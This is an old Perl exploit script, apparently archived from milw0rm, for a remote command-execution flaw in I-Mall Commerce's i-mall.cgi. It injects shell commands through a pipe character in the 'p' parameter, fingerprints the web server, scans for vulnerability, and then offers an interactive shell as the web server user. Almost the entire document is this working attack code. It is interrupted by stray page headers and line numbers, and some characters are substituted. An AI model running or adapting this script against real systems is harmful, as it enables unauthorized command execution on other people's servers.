
IMall Commerce imall.cgi Remote Command Execution Exploit

##############################################
# I-Mall exploit
# Spawn bash style Shell with webserver uid
# Greetz z\, spax, foxtwo, Zone-H
# This Script is currently under development
##############################################

use strict;
use warnings;
use IO::Socket;
  10   my $host;
  11   my $port;
  12   my $command;
  13   my $url;
  14   my $shiz;
  15   my @results;
  16   my $probe;
  17   my @U;
  18   $U[1] = "/i−mall/i−mall.cgi?p=|";
  19   &intro;
  20   &scan;
  21   &choose;
  22   &command;
  23   &exit;
  24   sub intro {
  25   &help;
  26   &host;
  27   &server;
  28   sleep 1;
  29   };
  30   sub host {
  31   print "\nHost or IP : ";
  32   $host=<STDIN>;
  33   chomp $host;
  34   if ($host eq ""){$host="127.0.0.1"};
  35   $shiz = "|";
  36   print "\nPort (enter to accept 80): ";
  37   $port=<STDIN>;
  38   chomp $port;
  39   if ($port =~/\D/ ){$port="80"};
  40   if ($port eq "" ) {$port = "80"};
  41   };
  42   sub server {
  43   my $X;
  44   print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
  45   $probe = "string";
  46   my $output;
  47   my $webserver = "something";
  48   &connect;
  49   for ($X=0; $X<=10; $X++){
  50             $output = $results[$X];
  51             if (defined $output){
  52             if ($output =~/apache/){ $webserver = "apache" };
Jerome Athias                                                                     05/04/2005
                           IMall Commerce imall.cgi Remote Command Execution Exploit   Page 2/4
  53              };
  54    };
  55    if ($webserver ne "apache"){
  56    my $choice = "y";
  57    chomp $choice;
  58    if ($choice =~/N/i) {&exit};
  59                   }else{
  60    print "\n\nOK";
  61              };
  62    };
  63    sub scan {
  64    my $status = "not_vulnerable";
  65    print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
  66    my $loop;
  67    my $output;
  68    my $flag;
  69    $command="dir";
  70    for ($loop=1; $loop < @U; $loop++) {
  71    $flag = "0";
  72    $url = $U[$loop];
  73    $probe = "scan";
  74    &connect;
  75    foreach $output (@results){
  76    if ($output =~ /Directory/) {
  77                                               $flag = "1";
  78                                               $status = "vulnerable";
  79                                               };
  80              };
  81    if ($flag eq "0") {
  82    }else{
  83         };
  84    };
  85    if ($status eq "not_vulnerable"){
  86
  87                                              };
  88    };
  89    sub choose {
  90
  91    my $choice="1";
  92    chomp $choice;
  93    if ($choice > @U){ &choose };
  94    if ($choice =~/\D/g ){ &choose };
  95    if ($choice == 0){ &other };
  96    $url = $U[$choice];
  97    };
  98    sub other {
  99    my $other = <STDIN>;
  100   chomp $other;
  101   $U[0] = $other;
  102   };
  103   sub command {
  104   while ($command !~/quit/i) {
Jerome Athias                                                                          05/04/2005
                         IMall Commerce imall.cgi Remote Command Execution Exploit                           Page 3/4
  105   print "[$host]\$ ";
  106   $command = <STDIN>;
  107   chomp $command;
  108   if ($command =~/quit/i) { &exit };
  109   if ($command =~/url/i) { &choose };
  110   if ($command =~/scan/i) { &scan };
  111   if ($command =~/help/i) { &help };
  112   $command =~ s/\s/+/g;
  113   $probe = "command";
  114   if ($command !~/quit|url|scan|help/) {&connect};
  115   };
  116   &exit;
  117   };
  118   sub connect {
  119   my $connection = IO::Socket::INET−>new (
  120                                      Proto => "tcp",
  121                                      PeerAddr => "$host",
  122                                      PeerPort => "$port",
  123                                      ) or die "\nSorry UNABLE TO CONNECT To $host On Port $port.\n";
  124   $connection −> autoflush(1);
  125   if ($probe =~/command|scan/){
  126   print $connection "GET $url$command$shiz HTTP/1.1\r\nHost: $host\r\n\r\n";
  127   }elsif ($probe =~/string/) {
  128   print $connection "HEAD / HTTP/1.1\r\nHost: $host\r\n\r\n";
  129   };
  130
  131   while ( <$connection> ) {
  132                             @results = <$connection>;
  133                              };
  134   close $connection;
  135   if ($probe eq "command"){ &output };
  136   if ($probe eq "string"){ &output };
  137   };
  138   sub output{
  139   my $display;
  140   if ($probe eq "string") {
  141                             my $X;
  142                             for ($X=0; $X<=10; $X++) {
  143                             $display = $results[$X];
  144                             if (defined $display){print "$display";};
  145                                       };
  146                             }else{
  147                             foreach $display (@results){
  148                                   print "$display";
  149                                       };
  150                                };
  151   };
  152   sub exit{
  153   print "\n\n\n ORP";
  154   exit;
  155   };
  156   sub help {
Jerome Athias                                                                                                05/04/2005
                           IMall Commerce imall.cgi Remote Command Execution Exploit   Page 4/4
  157   print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
  158   print "\n
  159      I−Mall E−Commerce Software i−mall.cgi
  160      Command Execution Vulnerability by SPABAM 2004" ;
  161   print "\n http://www.zone−h.org/advisories/read/id=4904
  162   ";
  163   print "\n I−Mall Exploit v0.99beta18";
  164   print "\n \n note.. web directory is normally /var/www/html";
  165   print "\n";
  166   print "\n Host: www.victim.com or xxx.xxx.xxx.xxx (RETURN for 127.0.0.1)";
  167   print "\n Command: SCAN URL HELP QUIT";
  168   print "\n\n\n\n\n\n\n\n\n\n\n";
  169   };
  170
# milw0rm.com [2005-05-04]



